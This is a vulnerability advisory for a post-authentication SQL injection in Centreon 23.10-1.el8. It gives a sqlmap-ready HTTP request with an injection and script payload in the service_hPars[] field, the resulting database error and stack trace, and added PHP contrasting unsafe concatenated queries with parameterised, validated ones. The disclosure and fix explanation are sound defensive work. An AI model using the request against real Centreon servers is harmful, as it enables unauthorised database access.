Centreon 23.10-1.el8 SQL Injection
Authored by Cody Sixteen | Site code610.blogspot.com

Centreon version 23.10-1.el8 suffers from a remote authenticated SQL injection vulnerability.
SHA-256 | ccd137a9553629c65cb1fcc131008c98cf86b7038c922afa5586765db2092434
;; Postauth SQL Injection in Centreon 23.10-1.el8
;; by code610
;;
;; found : 05.03.2024
;; version: centreon-vbox-vm-23_10-1.el8.zip
;; details: https://code610.blogspot.com/2024/04/postauth-sqli-in-centreon-2310-1el8.html
;;
;; sqlmap request.txt
POST /centreon/main.get.php?p=60201 HTTP/1.1
Host: 192.168.56.156
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 2529
Origin: http://192.168.56.156
Connection: keep-alive
Referer: http://192.168.56.156/centreon/main.get.php?p=60201&o=a
Cookie: PHPSESSID=dvipe1o0so6gcg52gkgcrg2avh
Upgrade-Insecure-Requests: 1
service_description=2222222222xxxxxxxx22&service_hPars%5B%5D='%3e%22%3e%3csvg%2fonload%3dprompt(123)%3e&service_template_model_stm_id=83&command_command_id=134&macroInput%5B0%5D=MODE&macroValue%5B0%5D=connection-time&macroFrom%5B0%5D=fromTpl&macroTplValue_0=connection-time&macroOriginalName_0=&macroTplValToDisplay_0=1&macroDescription_0=&macroTpl_0=Service+template+%3A+App-DB-MySQL-Connection-Time&macroOldValue_0=connection-time&isFrozen_0=0&clone_order_macro_0=&macroInput%5B1%5D=WARNING&macroValue%5B1%5D=1000&macroFrom%5B1%5D=fromTpl&macroTplValue_1=1000&macroOriginalName_1=&macroTplValToDisplay_1=1&macroDescription_1=&macroTpl_1=Service+template+%3A+App-DB-MySQL-Connection-Time&macroOldValue_1=1000&isFrozen_1=0&clone_order_macro_1=&macroInput%5B2%5D=CRITICAL&macroValue%5B2%5D=5000&macroFrom%5B2%5D=fromTpl&macroTplValue_2=5000&macroOriginalName_2=&macroTplValToDisplay_2=1&macroDescription_2=&macroTpl_2=Service+template+%3A+App-DB-MySQL-Connection-Time&macroOldValue_2=5000&isFrozen_2=0&clone_order_macro_2=&timeperiod_tp_id=1&service_max_check_attempts=&service_normal_check_interval=&service_retry_check_interval=&service_active_checks_enabled%5Bservice_active_checks_enabled%5D=2&service_passive_checks_enabled%5Bservice_passive_checks_enabled%5D=2&service_is_volatile%5Bservice_is_volatile%5D=2&service_notifications_enabled%5Bservice_notifications_enabled%5D=2&service_use_only_contacts_from_host%5Bservice_use_only_contacts_from_host%5D=0&service_notification_interval=&timeperiod_tp_id2=&service_first_notification_delay=&service_recovery_notification_delay=&service_obsess_over_service%5Bservice_obsess_over_service%5D=2&service_acknowledgement_timeout=&service_check_freshness%5Bservice_check_freshness%5D=2&service_freshness_threshold=&service_flap_detection_enabled%5Bservice_flap_detection_enabled%5D=2&service_low_flap_threshold=&service_high_flap_threshold=&service_retain_status_information%5Bservice_retain_status_information%5D=2&service_retain_nonstatus_information%5Bservice_retain_nonstatus_information%5D=2&service_event_handler_enabled%5Bservice_event_handler_enabled%5D=2&command_command_id2=&command_command_id_arg2=&graph_id=&esi_notes_url=&esi_notes=&esi_action_url=&esi_icon_image=&esi_icon_image_alt=&criticality_id=&geo_coords=&service_activate%5Bservice_activate%5D=1&service_comment=&submitA=Save&macroFrom%5B%23index%23%5D=direct&service_id=&service_register=1&p=60201&o=a&initialValues=a%3A0%3A%7B%7D&select=&argChecker=1&macChecker=1&centreon_token=0e87a8f24318f5221765b62c09cb10bf
;; ---
;; init response:
<a href="/main.php?p=60201"
class="pathWay">Services by host</a>
</div>
SQLSTATE[HY093]: Invalid parameter number: parameter was not definedSQLSTATE[HY093]: Invalid parameter number: parameter was not definedSQLSTATE[HY093]: Invalid parameter number: parameter was not definedSQLSTATE[HY093]: Invalid parameter number: parameter was not definedSQLSTATE[HY093]: Invalid parameter number: parameter was not definedSQLSTATE[HY093]: Invalid parameter number: parameter was not defined<br />
<b>Fatal error</b>: Uncaught PDOException: SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '"><svg/onload=prompt(123)>' AND hsr.service_service_id = service_id AND servi...' at line 1 in /usr/share/centreon/www/class/centreonDB.class.php:311
Stack trace:
#0 /usr/share/centreon/www/class/centreonDB.class.php(311): PDO->query()
#1 /usr/share/centreon/www/include/configuration/configObject/service/DB-Func.php(281): CentreonDB->query()
#2 /usr/share/centreon/vendor/openpsa/quickform/lib/HTML/QuickForm/Rule/Callback.php(57): testServiceExistence()
#3 /usr/share/centreon/vendor/openpsa/quickform/lib/HTML/QuickForm/RuleRegistry.php(130): HTML_QuickForm_Rule_Callback->validate()
#4 /usr/share/centreon/vendor/openpsa/quickform/lib/HTML/QuickForm.php(1315): HTML_QuickForm_RuleRegistry->validate()
#5 /usr/share/centreon/www/include/configuration/configObject/service/formService.php(1156): HTML_QuickForm->validate()
#6 /usr/share/centreon/www/include/configuration/configObject/service/serviceByHost.php(127): require_once('...')
#7 /usr/share/centreon/www/main.get.php(304): include_once('...')
#8 {main}
thrown in <b>/usr/share/centreon/www/class/centreonDB.class.php</b> on line <b>311</b><br />
;; ---
;; More:
;; https://code610.blogspot.com
;; https://twitter.com/CodySixteen
;;
;; cheers
;;
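The stack trace above places the failing query inside `testServiceExistence()`, a QuickForm validation callback, and the 1064 message shows the `service_hPars[]` value landing verbatim inside a quoted SQL literal followed by `AND hsr.service_service_id = service_id`. The following PHP is an added illustration of that defect class and its fix; it is not Centreon's code and not the author's. The function name is borrowed from the trace, while the table names (`service`, `host_service_relation`), the `host_host_id` column and the query shape are assumptions reconstructed from the SQL fragment in the error message.

```php
<?php
// Added illustration, NOT Centreon's source: a hypothetical testServiceExistence()
// written the unsafe way and the hardened way. Table/column names other than
// hsr.service_service_id and service_id are assumed from the error fragment above.

// Unsafe pattern: request values are concatenated into the SQL text. A quote
// inside service_hPars[] ends the literal early, the remainder becomes SQL, and
// MariaDB answers with error 1064 (the PDOException visible in the stack trace).
function testServiceExistenceUnsafe(PDO $db, string $description, array $hostIds): bool
{
    foreach ($hostIds as $hostId) {
        $sql = "SELECT service_id FROM service, host_service_relation hsr "
             . "WHERE hsr.host_host_id = '" . $hostId . "' "
             . "AND hsr.service_service_id = service_id "
             . "AND service_description = '" . $description . "'";
        $res = $db->query($sql);            // throws PDOException on a syntax error
        if ($res->fetch() !== false) {
            return false;                   // a service with this name already exists on the host
        }
    }
    return true;
}

// Hardened pattern: the SQL text is constant, every request value travels as a
// bound parameter, and host ids are type-checked before the database is asked.
function testServiceExistenceSafe(PDO $db, string $description, array $hostIds): bool
{
    $stmt = $db->prepare(
        "SELECT service_id FROM service "
        . "JOIN host_service_relation hsr ON hsr.service_service_id = service_id "
        . "WHERE hsr.host_host_id = :host_id AND service_description = :description"
    );
    foreach ($hostIds as $hostId) {
        // service_hPars[] is supposed to carry host ids, so anything that is not a
        // positive integer is rejected before any query runs. This alone would stop
        // the request shown above, independently of the parameter binding.
        $id = filter_var($hostId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
        if ($id === false) {
            throw new InvalidArgumentException('service_hPars[] must contain positive integer host ids');
        }
        // Every placeholder is bound on each iteration. Leaving one unbound is what
        // produces the SQLSTATE[HY093] "parameter was not defined" errors seen in
        // the response above; with ERRMODE_EXCEPTION execute() throws instead.
        $stmt->bindValue(':host_id', $id, PDO::PARAM_INT);
        $stmt->bindValue(':description', $description, PDO::PARAM_STR);
        $stmt->execute();
        if ($stmt->fetch() !== false) {
            return false;
        }
        $stmt->closeCursor();               // release the result set before the next execute()
    }
    return true;
}
```

Two points worth noting for anyone triaging the same trace. First, the "Invalid parameter number" messages that precede the fatal error are a separate symptom (a prepared statement executed with a missing bind), so a fix that only escapes the host id would leave them in place. Second, because the failing call sits in a form validation rule, the database is reached before the submitted data has been accepted, which is why input validation on `service_hPars[]` belongs in front of the query rather than behind it.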